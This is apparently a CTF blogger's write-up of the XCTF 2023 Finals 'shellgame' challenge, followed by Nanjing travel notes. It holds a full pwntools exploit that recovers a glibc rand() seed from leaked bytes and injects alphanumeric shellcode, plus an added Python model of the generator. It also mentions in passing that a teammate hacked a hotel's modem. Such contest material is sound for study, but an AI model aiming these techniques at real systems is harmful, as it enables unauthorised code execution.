XCTF-final-shellgame && travel photos

A pwn task hidden inside a misc challenge at the 2023 XCTF Finals in Nanjing

Posted by l0tus on 2023-04-01
Estimated Reading Time 3 Minutes
Words 800 In Total

The challenge

I never expected my first off-campus on-site contest to be something as big as the XCTF Finals. When the senior members of the team fought their way into a direct championship-qualifying spot I had not even started university, and now I have had the luck to travel to Nanjing with the team. The final lasted 12 hours, and I spent a whole afternoon on this pwn task hidden inside a misc challenge. In the end I only got as far as an idea; after the contest I asked the challenge author 空白爷 on QQ for the exp, so this post reproduces the challenge with it.

The idea is roughly this: from the 10 numbers the service gives you, brute-force the seed and recover all 160 random numbers, then work out how many random numbers must be added at each step to piece together the plaintext shellcode.
As for bypassing the pid check afterwards, crazyman's exact words were: "the part about the value of pid can consider using the idea of simulation to obtain pid==1".
I have not fully understood this challenge yet; the detailed steps will have to wait for a later write-up.
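The seed brute-force described above, as an added example that is not the challenge author's code: instead of calling the target's libc.so.6 through ctypes as the exp does, this models glibc's default rand()/srand() (the TYPE_3 additive feedback generator) in pure Python, so the leak-to-prediction step can be studied offline. It assumes the target uses glibc's default generator and seeds from the 0..0x100 range the exp searches; the sample seed, the leaked bytes and the signed-char printing (which the exp folds back with +0x100) are all constructed here.

```python
# Added example (not the challenge author's code): pure-Python model of glibc's
# rand()/srand(), used to show why ten leaked "lucky number" bytes are enough to
# recover the seed and predict the remaining stream. Assumed: glibc's default
# TYPE_3 generator and a seed in 0..0x100; every sample value is constructed.

M31 = 2147483647  # 2**31 - 1, modulus of the Park-Miller LCG glibc seeds with


def glibc_rand_stream(seed, count):
    """Return the first `count` rand() outputs after srand(seed).

    Follows glibc's random_r.c for the default 128-byte state: seed a
    Park-Miller LCG for 31 words, duplicate the first three, discard 310
    warm-up outputs, then emit (r[i-31] + r[i-3]) mod 2**32 shifted right by one.
    """
    seed &= 0xFFFFFFFF
    if seed == 0:              # glibc: srand(0) is treated as srand(1)
        seed = 1
    if seed >= 1 << 31:        # the state word is a signed 32-bit int
        seed -= 1 << 32
    r = [seed]
    for i in range(1, 31):
        # glibc uses Schrage's method for 16807*r mod (2**31-1); with Python
        # integers the plain modulo yields the identical non-negative value.
        r.append((16807 * r[i - 1]) % M31)
    for i in range(31, 34):
        r.append(r[i - 31])
    out = []
    for i in range(34, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
        if i >= 344:           # indices 34..343 are the discarded warm-up
            out.append(r[i] >> 1)
    return out


def low_bytes(seed, count):
    """The rand() % 0x100 sequence the service exposes, for a given seed."""
    return [v % 0x100 for v in glibc_rand_stream(seed, count)]


def fold_signed_char(values):
    """The binary prints each byte through a signed char, so 0x80..0xff show
    up negative; masking with 0xff is the same as the exp's +0x100 fix."""
    return [v & 0xFF for v in values]


def recover_seed(observed, max_seed=0x100):
    """Return the smallest seed in 0..max_seed whose low-byte stream starts
    with `observed`, or None. Seeds 0 and 1 produce the same stream (glibc
    maps 0 to 1), so the smallest match is reported; any other accidental
    match over ten bytes (80 bits) is not realistic for such a small space."""
    for seed in range(max_seed + 1):
        if low_bytes(seed, len(observed)) == list(observed):
            return seed
    return None


def demo(true_seed=0x42):
    """Constructed scenario: the service was seeded with `true_seed` and leaked
    ten bytes through a signed char. Recover the seed and predict all 161."""
    printed = [b if b < 0x80 else b - 0x100 for b in low_bytes(true_seed, 10)]
    observed = fold_signed_char(printed)
    seed = recover_seed(observed)
    if seed is None:
        return None, []
    return seed, low_bytes(seed, 161)


if __name__ == "__main__":
    seed, stream = demo()
    print("recovered seed:", seed)
    print("first 16 predicted bytes:", [hex(b) for b in stream[:16]])
```

The lesson for the defending side is the one the challenge is built on: a generator seeded from a few hundred possible values and then allowed to print its own outputs is fully determined by those outputs, so anything that must stay unpredictable needs a seed drawn from the OS entropy source and must not leak its raw stream.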

exp:

from pwn import *
from ctypes import *

io = process('./shellgame')
# io = remote('127.0.0.1', 11451)
context.arch = 'amd64'
context.log_level = 'debug'
libc = ELF('./libc.so.6')

# pwntools helper shorthands
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

# Call the target's own libc rand()/srand() through ctypes so the random
# stream matches the binary exactly.
clib = cdll.LoadLibrary("./libc.so.6")

# The service prints 10 "lucky numbers": rand() % 0x100 shown as signed chars.
ru("Your lucky number is:\n")
line = io.recvline().decode()
data = line.split(' ')[:-1]

src = []
for i in data:
    src.append(int(i[2:]))
for i in range(len(src)):
    if src[i] < 0:          # printed through a signed char: fold back into 0..0xff
        src[i] = 0x100 + src[i]

# Brute-force the seed: only seeds 0..0x100 are tried, and 10 bytes pin it down.
seed = 0
for i in range(0x101):
    clib.srand(i)
    flag = 0
    for j in range(10):
        t = clib.rand() % 0x100
        if t != src[j]:
            flag = 1
            break
    if flag == 0:
        seed = i
        break

# Replay the seed to recover the full random stream.
src = [0 for i in range(161)]
clib.srand(seed)
for i in range(161):
    src[i] = clib.rand() % 0x100

seedlist = []
shellcode = "W828Rvj8jf9zfYWj3hzZR9HR8ZYTT5ik0ZC839i3TjAiZTCRTiW88Bj0itY4Wfe99YoT08PTbfAf88i038sCWYfstX119TX00ZUtnYDSPZTJTX00TTA0AnmTYAjKT090T4iWjYH80iY1W"

# Target bytes: the alphanumeric shellcode followed by a terminating 0.
des = []
for i in range(len(shellcode) + 1):
    if i != len(shellcode):
        des.append(ord(shellcode[i]))
    else:
        des.append(0)
print([hex(x) for x in des])

# For each position, find a seed whose first rand() byte supplies the needed
# delta. The two rand() bytes that follow from the same seed land on the next
# two positions, so they are folded into src before moving on.
for i in range(len(shellcode) + 1):
    t = des[i] - src[i]
    if t < 0:
        t += 0x100
    for j in range(0x2000):
        clib.srand(j)
        if clib.rand() % 0x100 == t:
            seedlist.append(j)
            break
    src[i + 1] = (src[i + 1] + clib.rand() % 0x100) % 0x100
    src[i + 2] = (src[i + 2] + clib.rand() % 0x100) % 0x100
print(seedlist)


def add(idx, seed):
    sa(b'> ', b'1'.ljust(0x10, b'\x00') + p32(seed))
    sa(b'> ', str(idx).ljust(0x14, '\x00'))


for i in range(1, len(seedlist) + 1):
    add(i, seedlist[i - 1])
io.send(b'4'.ljust(0x14, b'\x00'))

io.interactive()

Trip to Nanjing

The team's final result was a little disappointing, not outstanding; over the following days we all toured Nanjing together.
line1 to CPU:

pwn/iot team party (白夜, nameless, doddy, me):

What I drank during the contest:

What 白夜 drank:

The night we got to the hotel, doddy pwned the hotel's optical modem:

Went to see the Qinhuai River and the Confucius Temple (夫子庙) with chuj, summer and lattice:

Group photo of the XCTF final on-site contestants and judges, plus the contestant badge summer gave me:

Feeding pigeons at the Music Terrace (音乐台), group photo:

Lunch at Nanjing Dapaidang (南京大排档), group photo:

Nanjing Museum, which has Republican-era buildings inside:

The Presidential Palace (总统府), with a cute little girl and cats:

Sun Yat-sen Mausoleum (中山陵), looking down over the city of Nanjing:

On the sightseeing bus:

And something fun on the street:

